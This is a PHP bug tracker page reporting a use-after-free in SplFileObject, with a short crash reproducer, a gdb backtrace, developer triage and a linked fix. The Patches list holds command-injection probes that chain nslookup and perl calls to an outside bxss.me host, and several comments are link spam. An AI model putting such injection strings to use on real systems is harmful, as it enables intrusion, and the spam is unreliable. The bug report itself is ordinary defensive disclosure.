php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login

go to bug id or search bugs for

Bug #81691 use-after-free of spl file handle
Submitted: 2021-12-03 08:44 UTC Modified: 2021-12-04 06:47 UTC
Votes:2
Avg. Score:2.0 ± 1.0
Reproduced:1 of 2 (50.0%)
Same Version:0 (0.0%)
Same OS:1 (100.0%)
From: cuirongzhen at huawei dot com Assigned:
Status: Open Package: SPL related
PHP Version: 8.1.0 OS: openEuler/Ubuntu 20.04.1
Private report: No CVE-ID: None
View Add Comment Developer Edit
Welcome back! If you're the original bug submitter, here's where you can edit the bug or add additional notes.
If this is not your bug, you can add a comment by following this link.
If this is your bug, but you forgot your password, you can retrieve your password here.
Password:
Status:
Package:
Bug Type:
Summary:
From: cuirongzhen at huawei dot com
New email:
PHP Version: OS:

 

 [2021-12-03 08:44 UTC] cuirongzhen at huawei dot com 
Description:
------------
Usually $file=SplFileObject(..) can be closed with $file=null.
However, fclose(end(get_resources())); can directly free the file stream without set $file to null.
It can cause use-after-free if $file gets accessed later.

Test script:
---------------
<?php
  $file=new SplFileObject("/tmp/1.txt");
  fclose(end(get_resources()));
  var_dump($file->fgets());
?>


Expected result:
----------------
report error at $file->fgets()

Actual result:
--------------
Program received signal SIGSEGV, Segmentation fault.
0x0000000000000000 in ?? ()
(gdb) bt
#0  0x0000000000000000 in ?? ()
#1  0x00005555559b83c9 in _php_stream_fill_read_buffer (stream=stream@entry=0x7ffff567e2a0, size=<optimized out>) at ./php-8.1.0-src/main/streams/streams.c:666
#2  0x00005555559b895f in _php_stream_get_line (stream=0x7ffff567e2a0, buf=buf@entry=0x0, maxlen=maxlen@entry=0, returned_len=returned_len@entry=0x7fffffffaa40)
    at ./php-8.1.0-src/main/streams/streams.c:981
#3  0x0000555555901110 in spl_filesystem_file_read (intern=0x7ffff5682000, silent=0) at ./php-8.1.0-src/ext/spl/spl_directory.c:1887
#4  0x00005555559014ff in zim_SplFileObject_fgets (execute_data=<optimized out>, return_value=0x7ffff56140e0) at ./php-8.1.0-src/ext/spl/spl_directory.c:2174
#5  0x0000555555a73363 in ZEND_DO_FCALL_SPEC_RETVAL_USED_HANDLER () at ./php-8.1.0-src/Zend/zend_vm_execute.h:1870
#6  execute_ex (ex=0x7ffff567e2a0) at ./php-8.1.0-src/Zend/zend_vm_execute.h:54555
#7  0x0000555555a74f14 in zend_execute (op_array=0x7ffff568a000, return_value=0x0) at ./php-8.1.0-src/Zend/zend_vm_execute.h:58882
#8  0x0000555555a084ab in zend_execute_scripts (type=type@entry=8, retval=retval@entry=0x0, file_count=file_count@entry=3) at ./php-8.1.0-src/Zend/zend.c:1761
#9  0x00005555559a471a in php_execute_script (primary_file=<optimized out>) at ./php-8.1.0-src/main/main.c:2534
#10 0x0000555555aeaf9b in do_cli (argc=2, argv=0x555556788ed0) at ./php-8.1.0-src/sapi/cli/php_cli.c:965
#11 0x000055555578f052 in main (argc=2, argv=0x555556788ed0) at ./php-8.1.0-src/sapi/cli/php_cli.c:1367

Patches

pHqghUme (last revision 2023-02-07 23:10 UTC by sample at email dot tst)
&(nslookup hitknmomucryof01c6.bxss.me||perl -e "gethostbyname('hitknmomucryof01c (last revision 2023-02-07 23:09 UTC by sample at email dot tst)
(nslookup hituryxpucghu27353.bxss.me||perl -e "gethostbyname('hituryxpucghu27353 (last revision 2023-01-21 23:17 UTC by sample at email dot tst)

Add a Patch

Pull Requests

Pull requests:

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2021-12-03 10:52 UTC] cmb@php.net 
Thanks for reporting this issue!  I don't think this qualifies as
security issue, but it is certainly bad that the underlying
resource can be accessed directly without the knowledge of the
object, which causes all kinds of issues (e.g. changing the stream
position on the resource would not cause a segfault, but other
erroneous behavior).
 [2021-12-04 06:47 UTC] stas@php.net
-Type: Security +Type: Bug
 [2022-01-12 20:09 UTC] camporter1 at gmail dot com 
The following pull request has been associated:

Patch Name: [SPL] Prevent fclose on underlying SplFileObject file stream.
On GitHub:  https://github.com/php/php-src/pull/7920
Patch:      https://github.com/php/php-src/pull/7920.patch
 [2022-12-08 07:10 UTC] Puckett3265elena at gmail dot com 
(https://www.mymorri.net/)github.com
To calculate pages you have to count PAGE headers.

Here is a part of code which does it

 SpoolFilename = Path.ChangeExtension(SpoolFilename, ".SPL")

    '\\ Open a binary reader for the spool file
    Dim SpoolFileStream As New System.IO.FileStream(SpoolFilename, FileMode.Open, FileAccess.Read)
    Dim SpoolBinaryReader As New BinaryReader(SpoolFileStream, System.Text.Encoding.UTF8)

    'Read the spooler records and count the total pages
    Dim recNext As EMFMetaRecordHeader = NextHeader(SpoolBinaryReader)
    While recNext.iType <> SpoolerRecordTypes.SRT_EOF
        If recNext.iType = SpoolerRecordTypes.SRT_PAGE Then
            _Pages += 1
        End If
        'SpoolfileReaderPerformaceCounter.Increment()
        Call SkipAHeader(recNext, SpoolBinaryReader)
        recNext = NextHeader(SpoolBinaryReader)
    End While
 [2022-12-23 08:28 UTC] marlynrasavong at gmail dot com 
There are more modes, but these are the most commonly used. After you have a FILE pointer, you can use basically the same IO commands.

(https://www.dunkinuniversity.org/)github.com
 [2022-12-26 11:46 UTC] asri dot jase0352 at gmail dot com 
Thanks for sharing such great information, the post you published have some great information which is quite beneficial for me. I highly appreciated with your work abilities. (https://www.officefootballpool.net/)github.com
 [2023-01-21 23:19 UTC] sample at email dot tst 
The following patch has been added/updated:

Patch Name: pHqghUme
Revision:   1674343156
URL:        https://bugs.php.net/patch-display.php?bug=81691&patch=pHqghUme&revision=1674343156
 [2023-01-21 23:19 UTC] sample at email dot tst 
The following patch has been added/updated:

Patch Name: pHqghUme
Revision:   1674343157
URL:        https://bugs.php.net/patch-display.php?bug=81691&patch=pHqghUme&revision=1674343157
 [2023-01-21 23:19 UTC] sample at email dot tst 
The following patch has been added/updated:

Patch Name: pHqghUme
Revision:   1674343159
URL:        https://bugs.php.net/patch-display.php?bug=81691&patch=pHqghUme&revision=1674343159
 [2023-01-21 23:52 UTC] sample at email dot tst 
The following patch has been added/updated:

Patch Name: pHqghUme
Revision:   1674345159
URL:        https://bugs.php.net/patch-display.php?bug=81691&patch=pHqghUme&revision=1674345159
 [2023-02-07 23:09 UTC] sample at email dot tst 
The following patch has been added/updated:

Patch Name: pHqghUme
Revision:   1675811392
URL:        https://bugs.php.net/patch-display.php?bug=81691&patch=pHqghUme&revision=1675811392
 [2023-02-07 23:10 UTC] sample at email dot tst 
The following patch has been added/updated:

Patch Name: pHqghUme
Revision:   1675811417
URL:        https://bugs.php.net/patch-display.php?bug=81691&patch=pHqghUme&revision=1675811417
 [2023-02-07 23:10 UTC] sample at email dot tst 
The following patch has been added/updated:

Patch Name: pHqghUme
Revision:   1675811422
URL:        https://bugs.php.net/patch-display.php?bug=81691&patch=pHqghUme&revision=1675811422
 [2023-05-25 10:27 UTC] ramonfergusonw55005 at gmail dot com 
That’s what I was looking for, what an info present here at this website, thank you admin!
https://www.prepaidgiftbalance.vip/php.net
 
PHP Copyright © 2001-2024 The PHP Group
All rights reserved. 		Last updated: Sat Apr 20 01:01:28 2024 UTC